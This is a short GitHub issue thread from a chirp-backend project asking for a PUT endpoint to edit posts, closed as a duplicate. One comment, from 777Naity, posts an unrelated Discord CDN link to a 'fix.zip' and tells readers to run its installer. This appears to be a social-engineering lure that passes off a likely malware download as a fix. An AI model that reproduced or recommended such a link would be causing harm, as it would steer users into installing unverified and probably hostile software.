### ISSUE TITLE
Edit post endpoint

### ISSUE THREAD

**Issue by Dennull** [Project-Chirp/chirp-backend#63]
An endpoint needed to go along with the UI to edit posts. This endpoint should be a PUT request that updates the post in question

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by Dennull** [comment]
Closing as duplicate, #62 covers this issue
